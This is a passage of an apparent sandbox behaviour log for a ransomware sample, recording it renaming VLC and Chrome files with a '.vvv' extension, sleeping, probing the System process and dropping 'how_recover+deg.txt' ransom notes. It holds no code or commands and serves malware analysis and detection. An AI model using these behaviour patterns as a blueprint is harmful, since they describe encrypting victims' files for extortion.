- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\playlist_small.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\playlist_small.png.vvv
- ads:
- fid (ads:): 562949953517737
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105332
- mode: rename
- sequenceNumber: 2433
- filesize: 542
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\plus.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\plus.png.vvv
- ads:
- fid (ads:): 562949953517738
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105340
- mode: rename
- sequenceNumber: 2434
- filesize: 526
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\prev.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\prev.png.vvv
- ads:
- fid (ads:): 562949953517739
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105348
- mode: rename
- sequenceNumber: 2435
- filesize: 574
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\refresh.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\refresh.png.vvv
- ads:
- fid (ads:): 562949953517740
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105356
- mode: rename
- sequenceNumber: 2436
- filesize: 526
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\repeat.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\repeat.png.vvv
- ads:
- fid (ads:): 562949953517741
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105364
- mode: rename
- sequenceNumber: 2437
- filesize: 558
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\reset.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\reset.png.vvv
- ads:
- fid (ads:): 562949953517742
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105372
- mode: rename
- sequenceNumber: 2438
- filesize: 542
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\sd.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\sd.png.vvv
- ads:
- fid (ads:): 562949953517743
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105380
- mode: rename
- sequenceNumber: 2439
- filesize: 526
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\shuffle.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\shuffle.png.vvv
- ads:
- fid (ads:): 562949953517744
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105389
- mode: rename
- sequenceNumber: 2440
- filesize: 510
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\slider_bar.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\slider_bar.png.vvv
- ads:
- fid (ads:): 562949953517745
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105397
- mode: rename
- sequenceNumber: 2441
- filesize: 510
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\slider_left.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\slider_left.png.vvv
- ads:
- fid (ads:): 562949953517746
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105405
- mode: rename
- sequenceNumber: 2442
- filesize: 526
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\slider_point.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\slider_point.png.vvv
- ads:
- fid (ads:): 562949953517747
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105414
- mode: rename
- sequenceNumber: 2443
- filesize: 510
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\slider_right.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\slider_right.png.vvv
- ads:
- fid (ads:): 562949953517748
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105422
- mode: rename
- sequenceNumber: 2444
- filesize: 526
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\slow.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\slow.png.vvv
- ads:
- fid (ads:): 562949953517749
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105430
- mode: rename
- sequenceNumber: 2445
- filesize: 622
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\snapshot.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\snapshot.png.vvv
- ads:
- fid (ads:): 562949953517750
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105438
- mode: rename
- sequenceNumber: 2446
- filesize: 526
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\sort.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\sort.png.vvv
- ads:
- fid (ads:): 562949953517751
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105445
- mode: rename
- sequenceNumber: 2447
- filesize: 526
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\sout.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\sout.png.vvv
- ads:
- fid (ads:): 562949953517752
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105453
- mode: rename
- sequenceNumber: 2448
- filesize: 590
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\speaker.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\speaker.png.vvv
- ads:
- fid (ads:): 562949953517753
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105461
- mode: rename
- sequenceNumber: 2449
- filesize: 750
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\speaker_mute.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\speaker_mute.png.vvv
- ads:
- fid (ads:): 562949953517754
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105469
- mode: rename
- sequenceNumber: 2450
- filesize: 510
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\stop.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\stop.png.vvv
- ads:
- fid (ads:): 562949953517755
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105477
- mode: rename
- sequenceNumber: 2451
- filesize: 526
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\volume_down.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\volume_down.png.vvv
- ads:
- fid (ads:): 562949953517756
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105486
- mode: rename
- sequenceNumber: 2452
- filesize: 542
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\volume_up.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\volume_up.png.vvv
- ads:
- fid (ads:): 562949953517757
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105496
- mode: rename
- sequenceNumber: 2453
- filesize: 494
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\white.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\white.png.vvv
- ads:
- fid (ads:): 562949953517758
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105503
- mode: rename
- sequenceNumber: 2454
- filesize: 526
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\white_cross_small.png
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\images\white_cross_small.png.vvv
- ads:
- fid (ads:): 562949953517759
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105526
- mode: rename
- sequenceNumber: 2455
- filesize: 43630
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\js\functions.js
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\js\functions.js.vvv
- ads:
- fid (ads:): 562949953517761
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105566
- mode: rename
- sequenceNumber: 2456
- filesize: 31742
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\js\vlm.js
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\js\vlm.js.vvv
- ads:
- fid (ads:): 562949953517762
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105595
- mode: rename
- sequenceNumber: 2457
- filesize: 5454
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\old\style.css
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\old\style.css.vvv
- ads:
- fid (ads:): 562949953517722
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105681
- mode: rename
- sequenceNumber: 2458
- filesize: 5902
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt
- new_name: C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt.vvv
- ads:
- fid (ads:): 562949953517764
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 105883
- mode: rename
- sequenceNumber: 2459
- filesize: 142974
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\NEWS.txt
- new_name: C:\Program Files\VideoLAN\VLC\NEWS.txt.vvv
- ads:
- fid (ads:): 1125899906934895
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 106299
- mode: rename
- sequenceNumber: 2460
- filesize: 3246
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\README.txt
- new_name: C:\Program Files\VideoLAN\VLC\README.txt.vvv
- ads:
- fid (ads:): 1407374883645552
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 106339
- mode: rename
- sequenceNumber: 2461
- filesize: 11054
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\sdk\activex\README.TXT
- new_name: C:\Program Files\VideoLAN\VLC\sdk\activex\README.TXT.vvv
- ads:
- fid (ads:): 562949953517621
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 106534
- mode: rename
- sequenceNumber: 2462
- filesize: 6062
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\VideoLAN\VLC\THANKS.txt
- new_name: C:\Program Files\VideoLAN\VLC\THANKS.txt.vvv
- ads:
- fid (ads:): 1688849860356209
- ntstatus: 0x0
- CreateOptions: 0x0
- apicall:
- timestamp: 113414
- repeat: 20000
- sequenceNumber: 2463
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- process:
- timestamp: 113475
- mode: opened
- sequenceNumber: 2464
- desiredaccess: 0x02000030
- ntstatus: 0xc0000022
- target:
- processinfo:
- pid: 4
- tid: 0
- imagepath: N/A
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- high_cpu:
- timestamp: 117766
- sequenceNumber: 2465
- total_cpu: 91.790996938384993
- processinfo:
- tainted: true
- pid: 2312
- process_cpu: 91.790996938384993
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 133173
- repeat: 10000
- mode: close
- sequenceNumber: 2466
- value: C:\Symbols\mfvdsp.pdb\how_recover+deg.txt
- filesize: 2673
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953530414
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 135003
- repeat: 10000
- mode: created
- sequenceNumber: 2467
- value: C:\Symbols\microsoft.web.services.dpws.pdb\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953530959
- ntstatus: 0x0
- CreateOptions: 0x60
- high_cpu:
- timestamp: 136464
- sequenceNumber: 2468
- total_cpu: 88.636295648795652
- processinfo:
- tainted: true
- pid: 2312
- process_cpu: 88.636295648795652
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- apicall:
- timestamp: 137857
- repeat: 30000
- sequenceNumber: 2469
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- process:
- timestamp: 137922
- mode: opened
- sequenceNumber: 2470
- desiredaccess: 0x02000030
- ntstatus: 0xc0000022
- target:
- processinfo:
- pid: 4
- tid: 0
- imagepath: N/A
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- high_cpu:
- timestamp: 154114
- sequenceNumber: 2471
- total_cpu: 80.596890547263683
- processinfo:
- tainted: true
- pid: 2312
- process_cpu: 80.596890547263683
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 155888
- mode: rename
- sequenceNumber: 2472
- filesize: 1174638
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\chrome_100_percent.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\chrome_100_percent.pak.vvv
- ads:
- fid (ads:): 1407374883636578
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 155972
- mode: rename
- sequenceNumber: 2473
- filesize: 1700254
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\chrome_200_percent.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\chrome_200_percent.pak.vvv
- ads:
- fid (ads:): 1407374883636579
- ntstatus: 0x0
- CreateOptions: 0x0
- apicall:
- timestamp: 177756
- repeat: 40000
- sequenceNumber: 2474
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- process:
- timestamp: 178617
- mode: opened
- sequenceNumber: 2475
- desiredaccess: 0x02000030
- ntstatus: 0xc0000022
- target:
- processinfo:
- pid: 4
- tid: 0
- imagepath: N/A
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 187379
- mode: rename
- sequenceNumber: 2476
- filesize: 156030590
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Installer\chrome.7z
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Installer\chrome.7z.vvv
- ads:
- fid (ads:): 1688849860347110
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 187804
- mode: rename
- sequenceNumber: 2477
- filesize: 383166
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\am.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\am.pak.vvv
- ads:
- fid (ads:): 1407374883636573
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 187818
- mode: rename
- sequenceNumber: 2478
- filesize: 370062
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ar.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ar.pak.vvv
- ads:
- fid (ads:): 1407374883636574
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 187849
- mode: rename
- sequenceNumber: 2479
- filesize: 461230
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\bg.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\bg.pak.vvv
- ads:
- fid (ads:): 1407374883636575
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 187870
- mode: rename
- sequenceNumber: 2480
- filesize: 587214
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\bn.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\bn.pak.vvv
- ads:
- fid (ads:): 1407374883636576
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 187901
- mode: rename
- sequenceNumber: 2481
- filesize: 278318
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ca.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\ca.pak.vvv
- ads:
- fid (ads:): 1407374883636577
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 187944
- mode: rename
- sequenceNumber: 2482
- filesize: 277806
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\cs.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\cs.pak.vvv
- ads:
- fid (ads:): 1407374883636580
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 187959
- mode: rename
- sequenceNumber: 2483
- filesize: 252862
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\da.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\da.pak.vvv
- ads:
- fid (ads:): 1407374883636581
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 187975
- mode: rename
- sequenceNumber: 2484
- filesize: 238974
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\de.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\de.pak.vvv
- ads:
- fid (ads:): 1407374883636582
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188010
- mode: rename
- sequenceNumber: 2485
- filesize: 504190
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\el.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\el.pak.vvv
- ads:
- fid (ads:): 1407374883636583
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188025
- mode: rename
- sequenceNumber: 2486
- filesize: 232446
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\en-GB.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\en-GB.pak.vvv
- ads:
- fid (ads:): 1125899906927884
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188042
- mode: rename
- sequenceNumber: 2487
- filesize: 232382
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\en-US.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\en-US.pak.vvv
- ads:
- fid (ads:): 1125899906927885
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188064
- mode: rename
- sequenceNumber: 2488
- filesize: 278094
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\es-419.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\es-419.pak.vvv
- ads:
- fid (ads:): 1125899906927886
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188160
- mode: rename
- sequenceNumber: 2489
- filesize: 283390
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\es.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\es.pak.vvv
- ads:
- fid (ads:): 1125899906927910
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188232
- mode: rename
- sequenceNumber: 2490
- filesize: 243566
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\et.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\et.pak.vvv
- ads:
- fid (ads:): 1125899906927911
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188354
- mode: rename
- sequenceNumber: 2491
- filesize: 394222
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\fa.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\fa.pak.vvv
- ads:
- fid (ads:): 844424930217276
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188369
- mode: rename
- sequenceNumber: 2492
- filesize: 261374
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\fi.pak
- new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\Application\36.0.1985.125\Locales\fi.pak.vvv
- ads:
- fid (ads:): 1125899906927935
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 188401
- mode: rename
- sequenceNumber: 2493
- filesize: 283294
- processinfo:
- pid: 1648
